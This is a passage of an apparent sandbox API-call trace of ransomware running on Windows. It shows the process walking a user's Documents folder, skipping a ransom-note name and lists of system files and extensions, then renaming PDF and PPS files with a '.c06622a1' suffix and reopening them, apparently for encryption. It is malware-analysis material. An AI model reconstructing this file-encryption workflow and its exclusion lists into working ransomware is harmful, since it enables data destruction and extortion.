ReadFile (in: hFile=0x368, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.244] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x5a665ced [0149.244] RtlComputeCrc32 (PartialCrc=0x5ced, Buffer=0x3fe674, Length=0x80) returned 0x47009bf7 [0149.244] RtlComputeCrc32 (PartialCrc=0x9bf7, Buffer=0x3fe674, Length=0x80) returned 0x2701dc9d [0149.244] RtlComputeCrc32 (PartialCrc=0xdc9d, Buffer=0x3fe674, Length=0x80) returned 0x7232a9fe [0149.244] RtlComputeCrc32 (PartialCrc=0xa9fe, Buffer=0x3fe674, Length=0x80) returned 0x3ee158f8 [0149.244] CloseHandle (hObject=0x368) returned 1 [0149.244] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.244] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf" [0149.244] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf") returned 0x51 [0149.244] wcscpy (in: _Dest=0x4540152, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.245] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\9mgtx3gvxovoc7xraj.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\9mgtx3gvxovoc7xraj.pdf.c06622a1"), dwFlags=0x8) returned 1 [0149.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\9mgtx3gvxovoc7xraj.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0149.247] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.247] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f9e0e92 [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54156866 [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x11b1307a [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x337de77 [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x48cac8c9 [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c0573af [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x69d7693b [0149.252] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x19ee0638 [0149.255] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0xc21b3ee1 [0149.255] RtlComputeCrc32 (PartialCrc=0x3ee1, Buffer=0x4820094, Length=0x80) returned 0x9e0dd0f1 [0149.255] RtlComputeCrc32 (PartialCrc=0xd0f1, Buffer=0x4820094, Length=0x80) returned 0x6f408017 [0149.255] RtlComputeCrc32 (PartialCrc=0x8017, Buffer=0x4820094, Length=0x80) returned 0x638066c2 [0149.255] RtlComputeCrc32 (PartialCrc=0x66c2, Buffer=0x4820094, Length=0x80) returned 0xebf8ad4a [0149.255] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0149.255] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.255] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.255] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce610870, ftCreationTime.dwHighDateTime=0x1d5d97e, ftLastAccessTime.dwLowDateTime=0x51dc5290, ftLastAccessTime.dwHighDateTime=0x1d5d9b1, ftLastWriteTime.dwLowDateTime=0x51dc5290, ftLastWriteTime.dwHighDateTime=0x1d5d9b1, nFileSizeHigh=0x0, nFileSizeLow=0x8c39, dwReserved0=0x0, dwReserved1=0x0, cFileName="G6xhilW7.pdf", cAlternateFileName="")) returned 1 [0149.255] _wcsicmp (_Str1="G6xhilW7.pdf", _Str2="README.c06622a1.TXT") returned -11 [0149.255] wcsstr (_Str="G6xhilW7.pdf", _SubStr="README") returned 0x0 [0149.255] _wcsicmp (_Str1="autorun.inf", _Str2="G6xhilW7.pdf") returned -6 [0149.255] wcslen (_String="autorun.inf") returned 0xb [0149.255] _wcsicmp (_Str1="boot.ini", _Str2="G6xhilW7.pdf") returned -5 [0149.255] wcslen (_String="boot.ini") returned 0x8 [0149.255] _wcsicmp (_Str1="bootfont.bin", _Str2="G6xhilW7.pdf") returned -5 [0149.255] wcslen (_String="bootfont.bin") returned 0xc [0149.255] _wcsicmp (_Str1="bootsect.bak", _Str2="G6xhilW7.pdf") returned -5 [0149.255] wcslen (_String="bootsect.bak") returned 0xc [0149.255] _wcsicmp (_Str1="desktop.ini", _Str2="G6xhilW7.pdf") returned -3 [0149.256] wcslen (_String="desktop.ini") returned 0xb [0149.256] _wcsicmp (_Str1="iconcache.db", _Str2="G6xhilW7.pdf") returned 2 [0149.256] wcslen (_String="iconcache.db") returned 0xc [0149.256] _wcsicmp (_Str1="ntldr", _Str2="G6xhilW7.pdf") returned 7 [0149.256] wcslen (_String="ntldr") returned 0x5 [0149.256] _wcsicmp (_Str1="ntuser.dat", _Str2="G6xhilW7.pdf") returned 7 [0149.256] wcslen (_String="ntuser.dat") returned 0xa [0149.256] _wcsicmp (_Str1="ntuser.dat.log", _Str2="G6xhilW7.pdf") returned 7 [0149.256] wcslen (_String="ntuser.dat.log") returned 0xe [0149.256] _wcsicmp (_Str1="ntuser.ini", _Str2="G6xhilW7.pdf") returned 7 [0149.256] wcslen (_String="ntuser.ini") returned 0xa [0149.256] _wcsicmp (_Str1="thumbs.db", _Str2="G6xhilW7.pdf") returned 13 [0149.256] wcslen (_String="thumbs.db") returned 0x9 [0149.256] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0149.256] wcslen (_String="386") returned 0x3 [0149.256] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0149.256] wcslen (_String="adv") returned 0x3 [0149.256] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0149.256] wcslen (_String="ani") returned 0x3 [0149.256] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0149.256] wcslen (_String="bat") returned 0x3 [0149.256] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0149.256] wcslen (_String="bin") returned 0x3 [0149.256] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0149.256] wcslen (_String="cab") returned 0x3 [0149.256] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0149.256] wcslen (_String="cmd") returned 0x3 [0149.256] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0149.256] wcslen (_String="com") returned 0x3 [0149.256] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0149.256] wcslen (_String="cpl") returned 0x3 [0149.256] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0149.256] wcslen (_String="cur") returned 0x3 [0149.256] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0149.256] wcslen (_String="deskthemepack") returned 0xd [0149.256] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0149.257] wcslen (_String="diagcab") returned 0x7 [0149.257] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0149.257] wcslen (_String="diagcfg") returned 0x7 [0149.257] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0149.257] wcslen (_String="diagpkg") returned 0x7 [0149.257] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0149.257] wcslen (_String="dll") returned 0x3 [0149.257] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0149.257] wcslen (_String="drv") returned 0x3 [0149.257] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0149.257] wcslen (_String="exe") returned 0x3 [0149.257] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0149.257] wcslen (_String="hlp") returned 0x3 [0149.257] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0149.257] wcslen (_String="icl") returned 0x3 [0149.257] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0149.257] wcslen (_String="icns") returned 0x4 [0149.257] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0149.257] wcslen (_String="ico") returned 0x3 [0149.257] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0149.257] wcslen (_String="ics") returned 0x3 [0149.257] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0149.257] wcslen (_String="idx") returned 0x3 [0149.257] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0149.257] wcslen (_String="ldf") returned 0x3 [0149.257] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0149.257] wcslen (_String="lnk") returned 0x3 [0149.257] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0149.257] wcslen (_String="mod") returned 0x3 [0149.257] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0149.257] wcslen (_String="mpa") returned 0x3 [0149.257] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0149.257] wcslen (_String="msc") returned 0x3 [0149.257] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0149.257] wcslen (_String="msp") returned 0x3 [0149.257] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0149.257] wcslen (_String="msstyles") returned 0x8 [0149.258] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0149.258] wcslen (_String="msu") returned 0x3 [0149.258] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0149.258] wcslen (_String="nls") returned 0x3 [0149.258] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0149.258] wcslen (_String="nomedia") returned 0x7 [0149.258] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0149.258] wcslen (_String="ocx") returned 0x3 [0149.258] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0149.258] wcslen (_String="prf") returned 0x3 [0149.258] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0149.258] wcslen (_String="ps1") returned 0x3 [0149.258] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0149.258] wcslen (_String="rom") returned 0x3 [0149.258] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0149.258] wcslen (_String="rtp") returned 0x3 [0149.258] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0149.258] wcslen (_String="scr") returned 0x3 [0149.258] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0149.258] wcslen (_String="shs") returned 0x3 [0149.258] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0149.258] wcslen (_String="spl") returned 0x3 [0149.258] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0149.258] wcslen (_String="sys") returned 0x3 [0149.258] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0149.258] wcslen (_String="theme") returned 0x5 [0149.258] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0149.258] wcslen (_String="themepack") returned 0x9 [0149.258] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0149.258] wcslen (_String="wpx") returned 0x3 [0149.258] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0149.258] wcslen (_String="lock") returned 0x4 [0149.258] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0149.258] wcslen (_String="key") returned 0x3 [0149.258] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0149.258] wcslen (_String="hta") returned 0x3 [0149.258] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0149.259] wcslen (_String="msi") returned 0x3 [0149.259] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0149.259] wcslen (_String="pdb") returned 0x3 [0149.259] _wcsicmp (_Str1="sql", _Str2="pdf") returned 3 [0149.259] wcslen (_String="sql") returned 0x3 [0149.259] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0149.259] wcslen (_String="sqlite") returned 0x6 [0149.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.259] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.259] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.259] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.259] wcscpy (in: _Dest=0x453011e, _Source="G6xhilW7.pdf" | out: _Dest="G6xhilW7.pdf") returned="G6xhilW7.pdf" [0149.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf", dwFileAttributes=0x80) returned 1 [0149.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\g6xhilw7.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64c [0149.259] SetFilePointerEx (in: hFile=0x64c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.260] ReadFile (in: hFile=0x64c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.260] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x4905c142 [0149.260] RtlComputeCrc32 (PartialCrc=0xc142, Buffer=0x3fe674, Length=0x80) returned 0x50e27e98 [0149.260] RtlComputeCrc32 (PartialCrc=0x7e98, Buffer=0x3fe674, Length=0x80) returned 0xf7ad146b [0149.260] RtlComputeCrc32 (PartialCrc=0x146b, Buffer=0x3fe674, Length=0x80) returned 0xbc70d414 [0149.261] RtlComputeCrc32 (PartialCrc=0xd414, Buffer=0x3fe674, Length=0x80) returned 0xd4d57f4 [0149.261] CloseHandle (hObject=0x64c) returned 1 [0149.261] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.261] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf" [0149.261] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf") returned 0x47 [0149.261] wcscpy (in: _Dest=0x454013e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.261] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\g6xhilw7.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\g6xhilw7.pdf.c06622a1"), dwFlags=0x8) returned 1 [0149.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\G6xhilW7.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\g6xhilw7.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x64c [0149.263] CreateIoCompletionPort (FileHandle=0x64c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.263] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0149.268] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x52446eae [0149.268] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27f2097 [0149.268] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f1f74b3 [0149.268] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x167ea88c [0149.268] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x75954112 [0149.269] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1a1c721f [0149.269] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47e7a895 [0149.269] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3730377c [0149.272] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0x84be982a [0149.272] RtlComputeCrc32 (PartialCrc=0x982a, Buffer=0x48b0094, Length=0x80) returned 0x63b055c9 [0149.272] RtlComputeCrc32 (PartialCrc=0x55c9, Buffer=0x48b0094, Length=0x80) returned 0xd4ac3c88 [0149.272] RtlComputeCrc32 (PartialCrc=0x3c88, Buffer=0x48b0094, Length=0x80) returned 0x29fb76fd [0149.272] RtlComputeCrc32 (PartialCrc=0x76fd, Buffer=0x48b0094, Length=0x80) returned 0xebae5c64 [0149.272] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0149.272] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.272] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.272] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fb6a30, ftCreationTime.dwHighDateTime=0x1d5d865, ftLastAccessTime.dwLowDateTime=0x3ca2baf0, ftLastAccessTime.dwHighDateTime=0x1d5db72, ftLastWriteTime.dwLowDateTime=0x3ca2baf0, ftLastWriteTime.dwHighDateTime=0x1d5db72, nFileSizeHigh=0x0, nFileSizeLow=0x16da2, dwReserved0=0x0, dwReserved1=0x0, cFileName="OVOG9EZGH62tetjqqe.pps", cAlternateFileName="OVOG9E~1.PPS")) returned 1 [0149.272] _wcsicmp (_Str1="OVOG9EZGH62tetjqqe.pps", _Str2="README.c06622a1.TXT") returned -3 [0149.272] wcsstr (_Str="OVOG9EZGH62tetjqqe.pps", _SubStr="README") returned 0x0 [0149.272] _wcsicmp (_Str1="autorun.inf", _Str2="OVOG9EZGH62tetjqqe.pps") returned -14 [0149.272] wcslen (_String="autorun.inf") returned 0xb [0149.272] _wcsicmp (_Str1="boot.ini", _Str2="OVOG9EZGH62tetjqqe.pps") returned -13 [0149.272] wcslen (_String="boot.ini") returned 0x8 [0149.272] _wcsicmp (_Str1="bootfont.bin", _Str2="OVOG9EZGH62tetjqqe.pps") returned -13 [0149.272] wcslen (_String="bootfont.bin") returned 0xc [0149.272] _wcsicmp (_Str1="bootsect.bak", _Str2="OVOG9EZGH62tetjqqe.pps") returned -13 [0149.272] wcslen (_String="bootsect.bak") returned 0xc [0149.272] _wcsicmp (_Str1="desktop.ini", _Str2="OVOG9EZGH62tetjqqe.pps") returned -11 [0149.272] wcslen (_String="desktop.ini") returned 0xb [0149.272] _wcsicmp (_Str1="iconcache.db", _Str2="OVOG9EZGH62tetjqqe.pps") returned -6 [0149.272] wcslen (_String="iconcache.db") returned 0xc [0149.272] _wcsicmp (_Str1="ntldr", _Str2="OVOG9EZGH62tetjqqe.pps") returned -1 [0149.272] wcslen (_String="ntldr") returned 0x5 [0149.272] _wcsicmp (_Str1="ntuser.dat", _Str2="OVOG9EZGH62tetjqqe.pps") returned -1 [0149.272] wcslen (_String="ntuser.dat") returned 0xa [0149.272] _wcsicmp (_Str1="ntuser.dat.log", _Str2="OVOG9EZGH62tetjqqe.pps") returned -1 [0149.272] wcslen (_String="ntuser.dat.log") returned 0xe [0149.272] _wcsicmp (_Str1="ntuser.ini", _Str2="OVOG9EZGH62tetjqqe.pps") returned -1 [0149.272] wcslen (_String="ntuser.ini") returned 0xa [0149.272] _wcsicmp (_Str1="thumbs.db", _Str2="OVOG9EZGH62tetjqqe.pps") returned 5 [0149.272] wcslen (_String="thumbs.db") returned 0x9 [0149.273] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0149.273] wcslen (_String="386") returned 0x3 [0149.273] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0149.273] wcslen (_String="adv") returned 0x3 [0149.273] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0149.273] wcslen (_String="ani") returned 0x3 [0149.273] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0149.273] wcslen (_String="bat") returned 0x3 [0149.273] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0149.273] wcslen (_String="bin") returned 0x3 [0149.273] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0149.273] wcslen (_String="cab") returned 0x3 [0149.273] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0149.273] wcslen (_String="cmd") returned 0x3 [0149.273] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0149.273] wcslen (_String="com") returned 0x3 [0149.273] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0149.273] wcslen (_String="cpl") returned 0x3 [0149.273] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0149.273] wcslen (_String="cur") returned 0x3 [0149.273] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0149.273] wcslen (_String="deskthemepack") returned 0xd [0149.273] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0149.273] wcslen (_String="diagcab") returned 0x7 [0149.273] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0149.273] wcslen (_String="diagcfg") returned 0x7 [0149.273] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0149.273] wcslen (_String="diagpkg") returned 0x7 [0149.273] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0149.273] wcslen (_String="dll") returned 0x3 [0149.273] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0149.273] wcslen (_String="drv") returned 0x3 [0149.273] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0149.273] wcslen (_String="exe") returned 0x3 [0149.273] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0149.273] wcslen (_String="hlp") returned 0x3 [0149.273] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0149.274] wcslen (_String="icl") returned 0x3 [0149.274] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0149.274] wcslen (_String="icns") returned 0x4 [0149.274] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0149.274] wcslen (_String="ico") returned 0x3 [0149.274] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0149.274] wcslen (_String="ics") returned 0x3 [0149.274] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0149.274] wcslen (_String="idx") returned 0x3 [0149.274] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0149.274] wcslen (_String="ldf") returned 0x3 [0149.274] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0149.274] wcslen (_String="lnk") returned 0x3 [0149.274] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0149.274] wcslen (_String="mod") returned 0x3 [0149.274] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0149.274] wcslen (_String="mpa") returned 0x3 [0149.274] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0149.274] wcslen (_String="msc") returned 0x3 [0149.274] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0149.274] wcslen (_String="msp") returned 0x3 [0149.274] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0149.274] wcslen (_String="msstyles") returned 0x8 [0149.274] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0149.274] wcslen (_String="msu") returned 0x3 [0149.274] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0149.274] wcslen (_String="nls") returned 0x3 [0149.274] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0149.274] wcslen (_String="nomedia") returned 0x7 [0149.274] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0149.274] wcslen (_String="ocx") returned 0x3 [0149.274] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0149.274] wcslen (_String="prf") returned 0x3 [0149.274] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0149.274] wcslen (_String="ps1") returned 0x3 [0149.274] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0149.274] wcslen (_String="rom") returned 0x3 [0149.274] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0149.274] wcslen (_String="rtp") returned 0x3 [0149.275] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0149.275] wcslen (_String="scr") returned 0x3 [0149.275] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0149.275] wcslen (_String="shs") returned 0x3 [0149.275] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0149.275] wcslen (_String="spl") returned 0x3 [0149.275] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0149.275] wcslen (_String="sys") returned 0x3 [0149.275] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0149.275] wcslen (_String="theme") returned 0x5 [0149.275] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0149.275] wcslen (_String="themepack") returned 0x9 [0149.275] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0149.275] wcslen (_String="wpx") returned 0x3 [0149.275] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0149.275] wcslen (_String="lock") returned 0x4 [0149.275] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0149.275] wcslen (_String="key") returned 0x3 [0149.275] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0149.275] wcslen (_String="hta") returned 0x3 [0149.275] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0149.275] wcslen (_String="msi") returned 0x3 [0149.275] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0149.275] wcslen (_String="pdb") returned 0x3 [0149.275] _wcsicmp 